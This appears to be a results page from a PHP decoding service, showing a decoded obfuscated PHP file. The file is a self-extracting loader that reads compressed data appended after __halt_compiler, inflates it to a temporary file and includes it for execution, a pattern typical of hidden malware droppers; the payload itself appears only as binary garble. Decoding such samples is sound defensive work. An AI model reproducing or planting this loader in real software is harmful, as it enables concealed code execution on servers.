Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* vdbhig */ //$_ = array($s, "666f70656e", "667365656b", "746d7066696c65", "737..

Decoded Output download

<?php 
/* vdbhig */ 
 
//$_ = array($s, "666f70656e", "667365656b", "746d7066696c65", "73747265616d5f6765745f6d6574615f64617461", "667772697465", "73747265616d5f6765745f636f6e74656e7473", "66636c6f7365", "5f5f68616c745f636f6d70696c6572", "677a696e666c617465"); 
$_ = array("hex2bin", "fopen", "fseek", "tmpfile", "stream_get_meta_data", "fwrite", "stream_get_contents", "fclose", "__halt_compiler", "gzinflate"); 
 
$x3 = 'fseek'; 
$x4 = 'tmpfile'; 
$x5 = 'stream_get_meta_data'; 
$x6 = 'fwrite'; 
$x7 = 'stream_get_contents'; 
$x8 = 'fclose'; 
$x9 = '__halt_compiler'; 
$x10 = 'gzinflate'; 
 
$f = fopen(__FILE__, "r"); 
fseek($f, __COMPILER_HALT_OFFSET__); 
$t = tmpfile(); 
$u = stream_get_meta_data($t); 
$u = $u["uri"]; 
 
fwrite($t, gzinflate(stream_get_contents($f))); 
var_dump(gzinflate(stream_get_contents($f))); 
include($u); 
fclose($t); 
__Halt_CompiLer(); 
 
j@p 
C46,J<@E3wwc9	o08B@$.k(*icN28im,$<<$u4aLdUrG6ww*3kUW<om7`>lwU[k 
P_Oji_~GWTcU+]	,x\.KIZ`Yf~[=pX3	c%8*Oo*_Ni= ?>

Did this file decode correctly?

Original Code

<?php
/* vdbhig */

//$_ = array($s, "666f70656e", "667365656b", "746d7066696c65", "73747265616d5f6765745f6d6574615f64617461", "667772697465", "73747265616d5f6765745f636f6e74656e7473", "66636c6f7365", "5f5f68616c745f636f6d70696c6572", "677a696e666c617465");
$_ = array("hex2bin", "fopen", "fseek", "tmpfile", "stream_get_meta_data", "fwrite", "stream_get_contents", "fclose", "__halt_compiler", "gzinflate");

$x3 = 'fseek';
$x4 = 'tmpfile';
$x5 = 'stream_get_meta_data';
$x6 = 'fwrite';
$x7 = 'stream_get_contents';
$x8 = 'fclose';
$x9 = '__halt_compiler';
$x10 = 'gzinflate';

$f = fopen(__FILE__, "r");
fseek($f, __COMPILER_HALT_OFFSET__);
$t = tmpfile();
$u = stream_get_meta_data($t);
$u = $u["uri"];

fwrite($t, gzinflate(stream_get_contents($f)));
var_dump(gzinflate(stream_get_contents($f)));
include($u);
fclose($t);
__Halt_CompiLer();

j@p
C46,J<@E3wwc9	o08B@$.k(*icN28im,$<<$u4aLdUrG6ww*3kUW<om7`>lwU[k
P_Oji_~GWTcU+]	,x\.KIZ`Yf~[=pX3	c%8*Oo*_Ni=

Function Calls

None

Variables

None

Stats

MD5 a3f000f2937638e46e17d19bbd7e2af6
Eval Count 0
Decode Time 51 ms